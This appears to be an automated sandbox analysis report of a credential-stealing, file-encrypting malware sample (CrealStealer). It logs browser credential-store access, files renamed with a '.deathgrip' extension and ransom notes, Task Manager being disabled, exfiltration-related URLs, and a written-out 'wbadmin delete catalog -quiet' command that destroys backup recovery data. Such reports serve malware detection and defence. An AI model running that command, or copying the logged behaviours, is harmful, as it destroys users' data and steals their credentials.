                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Registry value created: DisableTaskMgr 1
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\times.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\startupCache\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\read_it.txtJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match, File source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini.deathgrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db

                  Remote Access Functionality

                  Source: Yara match, File source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Mai.exe, Code function: 4_2_00007FFBA4717264 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,4_2_00007FFBA4717264
                  Source: C:\Users\user\Desktop\Mai.exe, Code function: 4_2_00007FFBA4715A70 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,Py_BuildValue,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PyList_GetItem,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,4_2_00007FFBA4715A70
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
                  | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Browser Extensions | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 4 File and Directory Discovery | Remote Desktop Protocol | 11 Browser Session Hijacking | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Inhibit System Recovery |
                  | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Obfuscated Files or Information | Security Account Manager | 46 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 12 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Clipboard Data | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | 2 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 File Deletion | DCSync | 51 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Masquerading | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                  | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                  [Behavior graph: Behavior Graph ID: 1504078, Sample: 4wx72yFLka.exe, Startdate: 04/09/2024, Architecture: WINDOWS, Score: 100]

                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | 4wx72yFLka.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.CrealStealer | |
                  | 4wx72yFLka.exe | 51% | Virustotal | | Browse |
                  | 4wx72yFLka.exe | 100% | Joe Sandbox ML | | |
                  Source | Detection | Scanner | Label | Link
                  No Antivirus matches
                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | rentry.co | 1% | Virustotal | | Browse |
                  Source | Detection | Scanner | Label | Link
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  rentry.co | 104.26.3.16 | true | true | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  • Avira URL Cloud: safe
                  unknown
                  https://rentry.co/5uu99/rawMai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.Mai.exe, 00000004.00000003.2455637329.000001995E65C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718278386.000001995E65C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://mahler:8092/site-updates.pyMai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.gofile.io/getServerrMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ipify.orgrMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://discord.gg/Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.firmaprofesional.com/cps0Mai.exe, 00000004.00000002.2707419898.000001995DCCB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718201292.000001995E611000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2460640379.000001995DCC3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/python/importlib_metadata/issues/396d__Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://netflix.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/urllib3/urllib3/issues/2920Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://gmail.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.securetrust.com/SGCA.crl0Mai.exe, 00000004.00000003.2317848602.000001995E688000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2403793060.000001995E689000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://outlook.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com)Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cacerts.digicert.coMai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.quovadisglobal.com/cps0Mai.exe, 00000004.00000003.2187500147.000001995F2FB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2312508752.000001995F339000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252890863.000001995F2FB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://binance.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://youtube.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://spotify.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
